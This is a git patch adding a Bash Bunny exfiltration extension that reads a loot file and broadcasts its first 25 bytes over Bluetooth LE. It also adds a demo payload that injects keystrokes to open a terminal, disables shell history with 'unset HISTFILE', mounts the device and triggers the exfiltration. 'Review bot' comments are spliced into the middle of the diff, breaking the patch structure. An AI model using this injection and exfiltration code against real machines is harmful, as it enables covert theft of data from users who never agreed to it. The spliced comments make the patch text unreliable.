From b59823da1e59aa9dbb3514fda8ff13f57fbf71a0 Mon Sep 17 00:00:00 2001
From: drapl0n <87269662+drapl0n@users.noreply.github.com>
Date: Tue, 3 May 2022 03:17:53 +0530
Subject: [PATCH] Uploading BLE_EXFIL extension (#519)
* Uploaded BunnyLogger
* uploading payload intel
* Create README.md
* Update README.md
* uploaded LinuxPreter
* uploaded FileRipper Faster executing version
* Update README.md
* fixing typo
* uploaded sudoSnatch
* Update README.md
* deleting sudoSnatch
* uploading payload
* Delete payload.sh
* Delete shell
* Delete systemBus
* Delete camPeek directory
* Update payload.sh
* Update payload.sh
* Delete payloads/library/execution/FileRipper directory
* Update payload.sh
* Update payload.sh
* Update payload.sh
* Update payload.sh
* uploading BLE_EXFIL extension BLE_EXFIL extension, exfiltrates data via BLE
* BLE_EXFIL demo
---
payloads/extensions/ble_exfil.sh | 16 +++++++
.../exfiltration/BLE_EXFIL_DEMO/payload.txt | 47 +++++++++++++++++++
2 files changed, 63 insertions(+)
create mode 100644 payloads/extensions/ble_exfil.sh
create mode 100644 payloads/library/exfiltration/BLE_EXFIL_DEMO/payload.txt
diff --git a/payloads/extensions/ble_exfil.sh b/payloads/extensions/ble_exfil.sh
new file mode 100644
index 00000000..47f5ce3d
--- /dev/null
+++ b/payloads/extensions/ble_exfil.sh
@@ -0,0 +1,16 @@
+#!/bin/bash
+#
+# BLE_EXFIL v1 by @drapl0n
+# Exfiltrate data(25 bytes) stored in "/loot/ble_exfil.txt" via BLE.
+# Usage: BLE_EXFIL
+
+function BLE_EXFIL() {
+ stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
+ stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
+ sleep 1
+ text=$(cat /root/udisk/loot/ble_exfil.txt)
+ exfil=${text:0:25}
+ echo -n -e "AT+ADVDAT=$exfil" > /dev/ttyS1
+}
+
+export -f BLE_EXFIL
diff --git a/payloads/library/exfiltration/BLE_EXFIL_DEMO/payload.txt b/payloads/library/exfiltration/BLE_EXFIL_DEMO/payload.txt
new file mode 100644
index 00000000..35e9dcac
--- /dev/null
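Review bot: The header comment of `ble_exfil.sh` gives the input as `/loot/ble_exfil.txt` while `BLE_EXFIL` reads `/root/udisk/loot/ble_exfil.txt`, and it never says that the first 25 bytes go out as BLE advertising data, which any receiver in range can read in the clear; both belong in the header so an operator does not place sensitive engagement data in that file by mistake. `text` and `exfil` are assigned without `local`, so they leak into every payload that sources the extension; `local text exfil` as the first line of the function would contain them. The `stty` line is issued twice with no comment, so either a comment should say why the repeat is needed or one copy can go. There is no check that the file is readable before the AT command is written, so a missing file still sends a bare `AT+ADVDAT=`; `[[ -r /root/udisk/loot/ble_exfil.txt ]] || return 1` would make that failure explicit.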
+++ b/payloads/library/exfiltration/BLE_EXFIL_DEMO/payload.txt
@@ -0,0 +1,47 @@
+# Description: Demonstration of BLE_EXFIL extension.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Exfiltration
+# Target: Unix-like operating systems.
+# Attackmodes: HID, Storage
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING lol='$(lsblk | grep 1.8G)'
+Q ENTER
+Q DELAY 100
+Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
+Q ENTER
+Q DELAY 2000
+Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [Advertising Data]
+Q STRING echo BashBunnyRocks \> '$mntt'/loot/ble_exfil.txt
+Q ENTER
+BLE_EXFIL
+Q DELAY 200
+Q STRING udisksctl unmount -b /dev/'$disk'
+Q ENTER
+Q DELAY 500
+Q STRING exit
+Q ENTER
+LED FINISH
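Review bot: The device lookup `lsblk | grep 1.8G` matches any block device or partition whose size prints as 1.8G, so on a host with another such volume the later `udisksctl mount` and `udisksctl unmount` can act on a device the demo does not own; the header should state that assumption next to `# Target:`. The header also omits what the demo leaves on the target: a terminal opened by injected keystrokes, `unset HISTFILE` in that shell, and udisks mount and unmount events for a removable volume. Listing these in the description tells a blue team running the demo which artifacts to look for. The `/tmp/tmppp` argument after `udisksctl mount -b` looks unused, since the mount point is read back from `lsblk` two steps later; that should be confirmed and the argument commented or dropped.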